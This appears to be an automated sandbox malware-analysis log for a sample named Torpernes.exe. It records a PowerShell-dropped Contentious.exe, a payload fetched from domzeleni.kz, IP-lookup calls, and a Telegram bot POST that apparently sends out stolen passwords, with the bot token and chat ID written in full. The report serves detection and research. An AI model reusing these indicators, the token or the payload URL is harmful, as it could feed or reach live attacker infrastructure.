            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: domzeleni.kz
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendDocument?chat_id=5811709821&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcad4b8239f5aaHost: api.telegram.orgContent-Length: 547Connection: Keep-Alive
            Source: Contentious.exe, 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: Contentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EA5000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: Contentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EE8000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F6E000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020E99000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EA5000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: Contentious.exe, 00000006.00000002.2944378842.0000000020DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: powershell.exe, 00000001.00000002.2177929958.0000000006E21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
            Source: Torpernes.exe, Contentious.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000001.00000002.2171178295.0000000004776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: Contentious.exe, 00000006.00000002.2944378842.0000000020EBD000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: powershell.exe, 00000001.00000002.2171178295.0000000004621000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000001.00000002.2171178295.0000000004776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000001.00000002.2171178295.0000000004621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: Contentious.exe, 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: Contentious.exe, 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: Contentious.exe, 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendDocument?chat_id=5811
            Source: powershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: Contentious.exe, 00000006.00000002.2928735040.0000000004A54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://domzeleni.kz/
            Source: Contentious.exe, 00000006.00000002.2943257213.00000000205A0000.00000004.00001000.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2928735040.0000000004A54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://domzeleni.kz/image/bwSNbczRiJIuD15.bin
            Source: Contentious.exe, 00000006.00000002.2928735040.0000000004A19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://domzeleni.kz/image/bwSNbczRiJIuD15.binB
            Source: powershell.exe, 00000001.00000002.2171178295.0000000004776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: Contentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EE8000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EA5000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: Contentious.exe, 00000006.00000002.2944378842.0000000020EA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
            Source: Contentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EE8000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownHTTPS traffic detected: 185.98.5.168:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2
            Source: C:\Users\user\Desktop\Torpernes.exeCode function: 0_2_00405200 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405200

            System Summary

            barindex
            Powershell drops PE file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Contentious.exeJump to dropped file
            Source: C:\Users\user\Desktop\Torpernes.exeCode function: 0_2_004031FF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess,0_2_004031FF
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_004031FF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess,6_2_004031FF
            Source: C:\Users\user\Desktop\Torpernes.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\Torpernes.exeCode function: 0_2_0040646E0_2_0040646E
            Source: C:\Users\user\Desktop\Torpernes.exeCode function: 0_2_00404A3D0_2_00404A3D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0457EAD81_2_0457EAD8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0457F3A81_2_0457F3A8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0457E7901_2_0457E790
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_0040646E6_2_0040646E
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_00404A3D6_2_00404A3D
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_001561086_2_00156108
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_0015C1906_2_0015C190
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_0015B3286_2_0015B328
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_0015C4736_2_0015C473
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_001567306_2_00156730
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_0015C7546_2_0015C754
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_0015F7786_2_0015F778
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_001598586_2_00159858
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_0015CA346_2_0015CA34
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_00154AD96_2_00154AD9
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_0015BBBA6_2_0015BBBA
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_0015BEB76_2_0015BEB7
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_0015E4316_2_0015E431
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_001535786_2_00153578
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_0015D7F06_2_0015D7F0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_0015D7E06_2_0015D7E0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_2042B0E06_2_2042B0E0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_2042C3EC6_2_2042C3EC
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20514F116_2_20514F11
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB75886_2_20CB7588
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB0D606_2_20CB0D60
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB32886_2_20CB3288
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBF8C96_2_20CBF8C9
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBF8D86_2_20CBF8D8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB08F06_2_20CB08F0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBF4806_2_20CBF480
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB04916_2_20CB0491
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBC4A86_2_20CBC4A8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB04A06_2_20CB04A0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBC4B86_2_20CBC4B8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB00406_2_20CB0040
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBC0506_2_20CBC050
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBC0606_2_20CBC060
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBF4716_2_20CBF471
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBBC086_2_20CBBC08
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBF0186_2_20CBF018
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBF0286_2_20CBF028
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB00236_2_20CB0023
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBD1C06_2_20CBD1C0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB6DF76_2_20CB6DF7
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBD1B06_2_20CBD1B0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBCD586_2_20CBCD58
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB0D506_2_20CB0D50
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBCD686_2_20CBCD68
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBC9016_2_20CBC901
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB09006_2_20CB0900
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBC9106_2_20CBC910
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB49246_2_20CB4924
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBDEC86_2_20CBDEC8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBAEEF6_2_20CBAEEF
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB32846_2_20CB3284
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBDEB86_2_20CBDEB8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBDA616_2_20CBDA61
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB7E786_2_20CB7E78
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBDA706_2_20CBDA70
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBD6096_2_20CBD609
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB6E006_2_20CB6E00
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBD6186_2_20CBD618
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBEBC16_2_20CBEBC1
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBEBD06_2_20CBEBD0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBBBF86_2_20CBBBF8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CB77A86_2_20CB77A8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBB7A06_2_20CBB7A0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBB7B06_2_20CBB7B0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBB3486_2_20CBB348
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBB3586_2_20CBB358
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBE7686_2_20CBE768
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBE7786_2_20CBE778
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBAF006_2_20CBAF00
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBE3106_2_20CBE310
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_20CBE3206_2_20CBE320
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_23829FB06_2_23829FB0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_2382CBD06_2_2382CBD0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_23828B006_2_23828B00
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_2382BF306_2_2382BF30
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_2382B2906_2_2382B290
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238236D86_2_238236D8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_2382A6006_2_2382A600
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_2382D2186_2_2382D218
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_2382DA486_2_2382DA48
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_2382C5806_2_2382C580
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238285B06_2_238285B0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_23820D486_2_23820D48
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238204986_2_23820498
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_2382B8E06_2_2382B8E0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_2382AC486_2_2382AC48
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_23829FA06_2_23829FA0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_2382CBC06_2_2382CBC0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238243D86_2_238243D8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_23826FE86_2_23826FE8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_23826FF86_2_23826FF8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238267136_2_23826713
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238267206_2_23826720
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_2382BF206_2_2382BF20
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238233506_2_23823350
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238233606_2_23823360
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_23826B696_2_23826B69
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_23826B786_2_23826B78
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_2382B2816_2_2382B281
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238262B86_2_238262B8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238262C86_2_238262C8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_2382D20A6_2_2382D20A
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_23825A086_2_23825A08
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_23825A186_2_23825A18
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_23825E606_2_23825E60
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_23825E706_2_23825E70
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238285A06_2_238285A0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238255B16_2_238255B1
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238255C06_2_238255C0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_2382A5F06_2_2382A5F0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_23827D006_2_23827D00
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238251386_2_23825138
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238251406_2_23825140
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238281486_2_23828148
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238281586_2_23828158
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_2382C5706_2_2382C570
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238204886_2_23820488
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238278986_2_23827898
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238278A86_2_238278A8
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_2382B8D06_2_2382B8D0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238208E16_2_238208E1
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238208F06_2_238208F0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_23827CF06_2_23827CF0
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238200076_2_23820007
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_2382AC376_2_2382AC37
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_2382743F6_2_2382743F
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238200406_2_23820040
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238228486_2_23822848
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238274506_2_23827450
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeCode function: 6_2_238228586_2_23822858
            Source: Torpernes.exeStatic PE information: invalid certificate
